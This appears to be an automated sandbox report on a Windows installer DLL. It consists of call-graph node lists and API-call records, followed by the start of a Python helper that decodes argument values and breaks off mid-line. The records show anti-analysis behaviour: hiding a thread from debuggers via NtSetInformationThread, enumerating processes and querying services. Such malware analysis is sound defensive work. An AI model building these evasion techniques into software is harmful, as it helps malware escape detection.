__wsopen_s HeapFree GetLastError 98076->98080 98077->98078 98078->98029 98081 6cb6f59b 98079->98081 98080->98078 98082 6cb6f5a2 GetLastError 98081->98082 98083 6cb6f48d __wsopen_s HeapFree GetLastError 98081->98083 98085 6cb6f5c8 98081->98085 98082->98078 98083->98085 98084 6cb77f33 __fassign MultiByteToWideChar 98086 6cb6f5df 98084->98086 98085->98078 98085->98084 98086->98078 98086->98082 98088 6cb87c17 98087->98088 98090 6cb87bfd 98087->98090 98089 6cb87b6c __wsopen_s 18 API calls 98088->98089 98094 6cb87c4f 98089->98094 98090->98088 98091 6cb73810 __Getctype 18 API calls 98090->98091 98091->98088 98092 6cb87c7e 98093 6cb89001 __wsopen_s 18 API calls 98092->98093 98099 6cb87779 98092->98099 98095 6cb87ccc 98093->98095 98094->98092 98096 6cb73810 __Getctype 18 API calls 98094->98096 98097 6cb87d49 98095->98097 98095->98099 98096->98092 98098 6cb7383d __Getctype 11 API calls 98097->98098 98100 6cb87d55 98098->98100 98099->98035 98101 6cb84cfc 98099->98101 98102 6cb84d08 __wsopen_s 98101->98102 98103 6cb73a8f std::_Lockit::_Lockit EnterCriticalSection 98102->98103 98106 6cb84d0f 98103->98106 98104 6cb84d56 98105 6cb84e06 __wsopen_s LeaveCriticalSection 98104->98105 98108 6cb84d76 98105->98108 98106->98104 98107 6cb84d34 98106->98107 98111 6cb84da3 EnterCriticalSection 98106->98111 98109 6cb84f32 __wsopen_s 11 API calls 98107->98109 98108->98035 98114 6cb87b47 CreateFileW 98108->98114 98110 6cb84d39 98109->98110 98110->98104 98113 6cb85080 __wsopen_s EnterCriticalSection 98110->98113 98111->98104 98112 6cb84db0 LeaveCriticalSection 98111->98112 98112->98106 98113->98104 98114->98042 98115->98046 98116->98043 98117->98047 98118->98048 98120 6cb84c92 __wsopen_s 18 API calls 98119->98120 98121 6cb7f025 98120->98121 98122 6cb7f02b 98121->98122 98124 6cb84c92 __wsopen_s 18 API calls 98121->98124 98131 6cb7f05d 98121->98131 98123 6cb84e0f __wsopen_s SetStdHandle 98122->98123 98130 6cb7f083 __dosmaperr 98123->98130 98126 6cb7f054 98124->98126 98125 6cb84c92 __wsopen_s 18 
API calls 98127 6cb7f069 CloseHandle 98125->98127 98128 6cb84c92 __wsopen_s 18 API calls 98126->98128 98127->98122 98129 6cb7f075 GetLastError 98127->98129 98128->98131 98129->98122 98130->98035 98131->98122 98131->98125 98132->98051 98133->98057 98134->98059 98135->97934 98137 6cb742ae 98136->98137 98138 6cb74299 98136->98138 98141 6cb742a9 98137->98141 98152 6cb743a9 98137->98152 98174 6cb73810 18 API calls __Getctype 98138->98174 98141->97938 98146 6cb742d1 98167 6cb7ef88 98146->98167 98148 6cb742d7 98148->98141 98175 6cb77eab HeapFree GetLastError _free 98148->98175 98150->97937 98151->97937 98153 6cb742c3 98152->98153 98154 6cb743c1 98152->98154 98158 6cb7be2e 98153->98158 98154->98153 98155 6cb7d350 18 API calls 98154->98155 98156 6cb743df 98155->98156 98176 6cb7f25c 98156->98176 98159 6cb7be45 98158->98159 98160 6cb742cb 98158->98160 98159->98160 98232 6cb77eab HeapFree GetLastError _free 98159->98232 98162 6cb7d350 98160->98162 98163 6cb7d371 98162->98163 98164 6cb7d35c 98162->98164 98163->98146 98233 6cb73810 18 API calls __Getctype 98164->98233 98166 6cb7d36c 98166->98146 98168 6cb7efae 98167->98168 98172 6cb7ef99 __dosmaperr 98167->98172 98169 6cb7efd5 98168->98169 98171 6cb7eff7 __dosmaperr 98168->98171 98234 6cb7f0b1 98169->98234 98242 6cb73810 18 API calls __Getctype 98171->98242 98172->98148 98174->98141 98175->98141 98177 6cb7f268 __wsopen_s 98176->98177 98178 6cb7f2ba 98177->98178 98180 6cb7f270 __dosmaperr 98177->98180 98181 6cb7f323 __dosmaperr 98177->98181 98187 6cb85080 EnterCriticalSection 98178->98187 98180->98153 98217 6cb73810 18 API calls __Getctype 98181->98217 98182 6cb7f2c0 98185 6cb7f2dc __dosmaperr 98182->98185 98188 6cb7f34e 98182->98188 98216 6cb7f31b LeaveCriticalSection __wsopen_s 98185->98216 98187->98182 98189 6cb7f370 98188->98189 98215 6cb7f38c __dosmaperr 98188->98215 98190 6cb7f3c4 98189->98190 98192 6cb7f374 __dosmaperr 98189->98192 98191 6cb7f3d7 98190->98191 98226 6cb7e359 20 API calls __wsopen_s 98190->98226 98218 
6cb7f530 98191->98218 98225 6cb73810 18 API calls __Getctype 98192->98225 98197 6cb7f3ed 98201 6cb7f416 98197->98201 98202 6cb7f3f1 98197->98202 98198 6cb7f42c 98199 6cb7f485 WriteFile 98198->98199 98200 6cb7f440 98198->98200 98203 6cb7f4a9 GetLastError 98199->98203 98199->98215 98205 6cb7f475 98200->98205 98206 6cb7f44b 98200->98206 98228 6cb7f5a1 43 API calls 5 library calls 98201->98228 98202->98215 98227 6cb7f94b 6 API calls __wsopen_s 98202->98227 98203->98215 98231 6cb7f9b3 7 API calls 2 library calls 98205->98231 98207 6cb7f465 98206->98207 98208 6cb7f450 98206->98208 98230 6cb7fb77 8 API calls 3 library calls 98207->98230 98211 6cb7f455 98208->98211 98208->98215 98229 6cb7fa8e 7 API calls 2 library calls 98211->98229 98213 6cb7f463 98213->98215 98215->98185 98216->98180 98217->98180 98219 6cb850d5 __wsopen_s 18 API calls 98218->98219 98220 6cb7f541 98219->98220 98221 6cb7f3e8 98220->98221 98222 6cb780a2 __Getctype 37 API calls 98220->98222 98221->98197 98221->98198 98223 6cb7f564 98222->98223 98223->98221 98224 6cb7f57e GetConsoleMode 98223->98224 98224->98221 98225->98215 98226->98191 98227->98215 98228->98215 98229->98213 98230->98213 98231->98213 98232->98160 98233->98166 98235 6cb7f0bd __wsopen_s 98234->98235 98243 6cb85080 EnterCriticalSection 98235->98243 98237 6cb7f0cb 98238 6cb7f0f8 98237->98238 98239 6cb7f015 __wsopen_s 21 API calls 98237->98239 98244 6cb7f131 LeaveCriticalSection __wsopen_s 98238->98244 98239->98238 98241 6cb7f11a 98241->98172 98242->98172 98243->98237 98244->98241 98245->97773 98246->97775 98247->97773 98248->97773 98249->97773 98251 6ca3022e 98250->98251 98252 6ca070c4 98251->98252 98257 6cb74ecb 98251->98257 98252->97786 98254->97787 98255->97789 98256->97791 98258 6cb74ef6 98257->98258 98259 6cb74ed9 98257->98259 98258->98251 98259->98258 98260 6cb74ee6 98259->98260 98261 6cb74efa 98259->98261 98273 6cb73810 18 API calls __Getctype 98260->98273 98265 6cb750f2 98261->98265 98266 6cb750fe __wsopen_s 98265->98266 98274 6cb6fc99 
EnterCriticalSection 98266->98274 98268 6cb7510c 98275 6cb750af 98268->98275 98272 6cb74f2c 98272->98251 98273->98258 98274->98268 98283 6cb7bc96 98275->98283 98281 6cb750e9 98282 6cb75141 LeaveCriticalSection 98281->98282 98282->98272 98284 6cb7d350 18 API calls 98283->98284 98285 6cb7bca7 98284->98285 98286 6cb850d5 __wsopen_s 18 API calls 98285->98286 98287 6cb7bcad __wsopen_s 98286->98287 98288 6cb750c3 98287->98288 98300 6cb77eab HeapFree GetLastError _free 98287->98300 98290 6cb74f2e 98288->98290 98292 6cb74f40 98290->98292 98295 6cb74f5e 98290->98295 98291 6cb74f4e 98301 6cb73810 18 API calls __Getctype 98291->98301 98292->98291 98294 6cb74f76 _Yarn 98292->98294 98292->98295 98294->98295 98296 6cb743a9 62 API calls 98294->98296 98297 6cb7d350 18 API calls 98294->98297 98298 6cb7f25c __wsopen_s 62 API calls 98294->98298 98299 6cb7bd49 62 API calls 98295->98299 98296->98294 98297->98294 98298->98294 98299->98281 98300->98288 98301->98295 98303 6cb69715 98302->98303 98304 6ca32020 52 API calls 98303->98304 98305 6cb697b6 98304->98305 98306 6cb6a133 std::_Facet_Register 4 API calls 98305->98306 98307 6cb697ee 98306->98307 98308 6cb6aa17 43 API calls 98307->98308 98309 6cb69802 98308->98309 98310 6ca31d90 89 API calls 98309->98310 98311 6cb698ab 98310->98311 98312 6cb698dc 98311->98312 98356 6ca32250 30 API calls 98311->98356 98312->97802 98314 6cb69916 98357 6ca326e0 24 API calls 4 library calls 98314->98357 98316 6cb69928 98358 6cb6ca69 RaiseException 98316->98358 98318 6cb6993d 98359 6ca2e010 67 API calls 98318->98359 98320 6cb6994f 98320->97802 98322 6cb69a7d 98321->98322 98360 6cb69c90 98322->98360 98324 6cb69b6c 98324->97813 98327 6cb69a95 98327->98324 98378 6ca32250 30 API calls 98327->98378 98379 6ca326e0 24 API calls 4 library calls 98327->98379 98380 6cb6ca69 RaiseException 98327->98380 98330 6ca4304f 98329->98330 98333 6ca43063 98330->98333 98389 6ca33560 32 API calls std::_Xinvalid_argument 98330->98389 98336 6ca4311e 98333->98336 98391 6ca32250 30 
API calls 98333->98391 98392 6ca326e0 24 API calls 4 library calls 98333->98392 98393 6cb6ca69 RaiseException 98333->98393 98335 6ca43131 98335->97813 98336->98335 98390 6ca337e0 32 API calls std::_Xinvalid_argument 98336->98390 98340 6cb6928e 98339->98340 98341 6cb692c1 98339->98341 98342 6ca301f0 64 API calls 98340->98342 98343 6cb69373 98341->98343 98394 6ca32250 30 API calls 98341->98394 98344 6cb692b4 98342->98344 98343->97814 98345 6cb74208 67 API calls 98344->98345 98345->98341 98347 6cb6939e 98395 6ca32340 24 API calls 98347->98395 98349 6cb693ae 98396 6cb6ca69 RaiseException 98349->98396 98351 6cb693b9 98397 6ca2e010 67 API calls 98351->98397 98353 6cb69412 std::ios_base::_Ios_base_dtor 98353->97814 98354->97806 98355->97812 98356->98314 98357->98316 98358->98318 98359->98320 98361 6cb69ccc 98360->98361 98362 6cb69cf8 98360->98362 98376 6cb69cf1 98361->98376 98383 6ca32250 30 API calls 98361->98383 98367 6cb69d09 98362->98367 98381 6ca33560 32 API calls std::_Xinvalid_argument 98362->98381 98365 6cb69ed8 98384 6ca32340 24 API calls 98365->98384 98367->98376 98382 6ca32f60 42 API calls 4 library calls 98367->98382 98368 6cb69ee7 98385 6cb6ca69 RaiseException 98368->98385 98372 6cb69f17 98387 6ca32340 24 API calls 98372->98387 98374 6cb69f2d 98388 6cb6ca69 RaiseException 98374->98388 98376->98327 98377 6cb69d43 98377->98376 98386 6ca32250 30 API calls 98377->98386 98378->98327 98379->98327 98380->98327 98381->98367 98382->98377 98383->98365 98384->98368 98385->98377 98386->98372 98387->98374 98388->98376 98389->98333 98390->98335 98391->98333 98392->98333 98393->98333 98394->98347 98395->98349 98396->98351 98397->98353 98398 6c9ff150 98400 6c9fefbe 98398->98400 98399 6c9ff243 CreateFileA 98403 6c9ff2a7 98399->98403 98400->98399 98401 6ca002ca 98402 6ca002ac GetCurrentProcess TerminateProcess 98402->98401 98403->98401 98403->98402
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: _strlen
                                      • String ID: HR^
                                      • API String ID: 4218353326-1341859651
                                      • Opcode ID: bcba25816ed872ca2abcf86a0838e174554bba07e80a525ee37cc8d15ea4147f
                                      • Instruction ID: 5eb6ec1a67c50d132094c38451ae99f080db0067f9b56a186e6c319187753ac7
                                      • Opcode Fuzzy Hash: bcba25816ed872ca2abcf86a0838e174554bba07e80a525ee37cc8d15ea4147f
                                      • Instruction Fuzzy Hash: D574E571644B028FC729CF28C8D0695B7F2FF99318B198A6DC0A68BB55E774F54ACB40

                                      Control-flow Graph
                                      • Control-flow graph of the function at 6cb68930 (basic blocks 6cb68930 to 6cb68aa4; the graph rendering and its executed/not-executed colouring are not reproduced). Calls in the graph: CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, CloseHandle, and the internal functions 6cb6f010 and 6cb762f5.
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CB6893E
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: CreateSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 3332741929-0
                                      • Opcode ID: c62689ea678a7f241ece43686757bb0282a83ab5f056c5421bc278ed67b1ffe3
                                      • Instruction ID: 33a1184b2948f0d402244d3d4f4e984fb462691f7ae018a1e3c73fd326652846
                                      • Opcode Fuzzy Hash: c62689ea678a7f241ece43686757bb0282a83ab5f056c5421bc278ed67b1ffe3
                                      • Instruction Fuzzy Hash: B43180B020A3419FD7119F5AD88475ABBE4EF8A708F145D2EF4C9D6BA0D732D8848B53

                                      Control-flow Graph
                                      • Control-flow graph of the function starting at 6c9e3886 (basic blocks span 6c9e383b to 6c9e414b; the graph rendering and its executed/not-executed colouring are not reproduced). Calls in the graph: the internal functions 6cb32a20, 6cb32a30 and 6c9e3750, followed by GetCurrentThread and NtSetInformationThread in block 6c9e3e81-6c9e3ee0.
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a35fa58d45b98c1cdd422138b43b6faf2862e61b28196371f68b7349d68b797d
                                      • Instruction ID: bb2482b437d124277decd47d29ca6dc7d2e2c27dd08637ec69521ef343dff010
                                      • Opcode Fuzzy Hash: a35fa58d45b98c1cdd422138b43b6faf2862e61b28196371f68b7349d68b797d
                                      • Instruction Fuzzy Hash: 9232D5322457018FC325CF28C8906A5B7E3FFE93147698A6CC0EA5BA65D775F44ACB50
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: CurrentThread
                                      • String ID:
                                      • API String ID: 2882836952-0
                                      • Opcode ID: 0e67695622843bd7810fe5bcfadb056ff7cb48f3f603d78f8e62effb44115d00
                                      • Instruction ID: 8df931657db24c88708761229c7e3f4f07322ef2b666b6dbcf7bd3c9499c2623
                                      • Opcode Fuzzy Hash: 0e67695622843bd7810fe5bcfadb056ff7cb48f3f603d78f8e62effb44115d00
                                      • Instruction Fuzzy Hash: A151E2311547018FC322CF39C884795B7A3BFA9314F698E5DC0E61BAA5DB75F44A8B41
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: CurrentThread
                                      • String ID:
                                      • API String ID: 2882836952-0
                                      • Opcode ID: 58348398d1f116c7c628db4816a380e390d0ea52ac17b6f0742f6b00b637e932
                                      • Instruction ID: d7c4d43f7ff1b5910fbdc726e0acbfb9eba5436f47a8c12300a7e98a247c615f
                                      • Opcode Fuzzy Hash: 58348398d1f116c7c628db4816a380e390d0ea52ac17b6f0742f6b00b637e932
                                      • Instruction Fuzzy Hash: B451D131114B01CBC322CF39C4847A5B7A3BFA9314F698A5DC0E65BAA5DB71F44A8B91
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 6C9E3E9D
                                      • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C9E3EAA
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: Thread$CurrentInformation
                                      • String ID:
                                      • API String ID: 1650627709-0
                                      • Opcode ID: a094e62509431ef43c0effa462623292e4e7a560aef5962c694ad3150fcbc6aa
                                      • Instruction ID: d0f4fb905e039ea34283e66c349fc300372ff789f5386cfc6759bd7694da3638
                                      • Opcode Fuzzy Hash: a094e62509431ef43c0effa462623292e4e7a560aef5962c694ad3150fcbc6aa
                                      • Instruction Fuzzy Hash: 58313131105B01CBC721CF74C8887D6B7A3BFAA314F2A8E5CC0A65BAA1DB74B0099B51
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 6C9E3E9D
                                      • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C9E3EAA
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: Thread$CurrentInformation
                                      • String ID:
                                      • API String ID: 1650627709-0
                                      • Opcode ID: c5bcf13259c21d8fef5175ca636596ee1685ffe995ac3fb769fed439e472e557
                                      • Instruction ID: 25994bae70fcbbe5f456ef1b68b36355928c652ab2e520eb3a981929dc8b2e06
                                      • Opcode Fuzzy Hash: c5bcf13259c21d8fef5175ca636596ee1685ffe995ac3fb769fed439e472e557
                                      • Instruction Fuzzy Hash: 45310F31114701CBD721CF78C8847A6B7B6BFAA304F294E5CC0AA5BAA1DB71F0459B82
                                      APIs
                                      • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CB68820
                                      • OpenServiceA.ADVAPI32(?,?,00000004), ref: 6CB688C5
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: Open$ManagerService
                                      • String ID:
                                      • API String ID: 2351955762-0
                                      • Opcode ID: 20acbacc7228720c3f710b6728113f0c91634afdfa8c324581e69b5a1cadd4c2
                                      • Instruction ID: af02e6d36181ffe12fbea662fef1651e4c8b470e6e71c905fc4a76f4884a10f7
                                      • Opcode Fuzzy Hash: 20acbacc7228720c3f710b6728113f0c91634afdfa8c324581e69b5a1cadd4c2
                                      • Instruction Fuzzy Hash: AE312874618342AFC700CF2AC949A1EBBF0AB8A355F548C5EF498D7761D372C8489B63
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 6C9E3E9D
                                      • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C9E3EAA
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: Thread$CurrentInformation
                                      • String ID:
                                      • API String ID: 1650627709-0
                                      • Opcode ID: 600c240e179074ab6c2d03fb46b3e4b3c4aba01c6878794498f99add940c8008
                                      • Instruction ID: 7912b14baa5bbe4fa4ee44a795c6d50b5c0b385f62f72ef3372e062b5e219f9f
                                      • Opcode Fuzzy Hash: 600c240e179074ab6c2d03fb46b3e4b3c4aba01c6878794498f99add940c8008
                                      • Instruction Fuzzy Hash: 9D213630118701CBD725CF74C8947A677B6BF7A305F194E6DC0A68BAA1DB74F0049B52
                                      APIs
                                      • FindFirstFileA.KERNEL32(?,?), ref: 6CB5E0AC
                                      • FindClose.KERNEL32(000000FF), ref: 6CB5E0E2
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                       • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmp
                                       • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID:
                                      • API String ID: 2295610775-0
                                      • Opcode ID: 045f9ef4e4fd3d3a9fa35c4f871f11732a48233b3e976d669eb65b5a35910c9c
                                      • Instruction ID: 208c7639110ad452ef047ae0db9ed07d83469c60b1206c38b00b16a17205f1fa
                                      • Opcode Fuzzy Hash: 045f9ef4e4fd3d3a9fa35c4f871f11732a48233b3e976d669eb65b5a35910c9c
                                      • Instruction Fuzzy Hash: 33112B745082D19FC7108F29C94595EBBF8AB86314F984D4AF4A8CA690D738D8A88B83
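The API records above only give raw argument values: NtSetInformationThread is called with ThreadInformationClass 00000011, OpenSCManagerA with access mask 00000001 and OpenServiceA with access mask 00000004. The following triage helper is an added example, not code from this report or from Joe Sandbox. It parses lines in the report's own "Api.MODULE(args), ref: addr" form and maps those values to the documented Windows constants (0x11 is THREADINFOCLASS ThreadHideFromDebugger; the access-right values come from winsvc.h). The lines in REPORT_LINES are copied from the records above as sample input.

```python
"""Decode Joe Sandbox API-call records into named Windows constants.

Added triage helper; not part of the report and not Joe Sandbox code.
REPORT_LINES are copied from the API records in the report as sample input.
"""
import re
from dataclasses import dataclass
from typing import Optional

# THREADINFOCLASS (ntdll): 0x11 is the class used by the sample.
THREAD_INFO_CLASS = {0x11: "ThreadHideFromDebugger"}

# Service control manager access rights (winsvc.h), single-bit flags only.
SC_MANAGER_ACCESS = {
    0x0001: "SC_MANAGER_CONNECT",
    0x0002: "SC_MANAGER_CREATE_SERVICE",
    0x0004: "SC_MANAGER_ENUMERATE_SERVICE",
    0x0008: "SC_MANAGER_LOCK",
    0x0010: "SC_MANAGER_QUERY_LOCK_STATUS",
    0x0020: "SC_MANAGER_MODIFY_BOOT_CONFIG",
}
SERVICE_ACCESS = {
    0x0001: "SERVICE_QUERY_CONFIG",
    0x0002: "SERVICE_CHANGE_CONFIG",
    0x0004: "SERVICE_QUERY_STATUS",
    0x0008: "SERVICE_ENUMERATE_DEPENDENTS",
    0x0010: "SERVICE_START",
    0x0020: "SERVICE_STOP",
    0x0040: "SERVICE_PAUSE_CONTINUE",
    0x0080: "SERVICE_INTERROGATE",
    0x0100: "SERVICE_USER_DEFINED_CONTROL",
}

# Sample input: lines copied from the report's API records (plus one non-call line).
REPORT_LINES = [
    "• GetCurrentThread.KERNEL32 ref: 6C9E3E9D",
    "• NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C9E3EAA",
    "• OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CB68820",
    "• OpenServiceA.ADVAPI32(?,?,00000004), ref: 6CB688C5",
    "• FindFirstFileA.KERNEL32(?,?), ref: 6CB5E0AC",
    "• FindClose.KERNEL32(000000FF), ref: 6CB5E0E2",
    "Memory Dump Source",
]


@dataclass
class ApiCall:
    api: str
    module: str
    args: list   # one int per argument, None where the sandbox printed '?'
    ref: int     # address of the call site inside the dumped module


_CALL_RE = re.compile(
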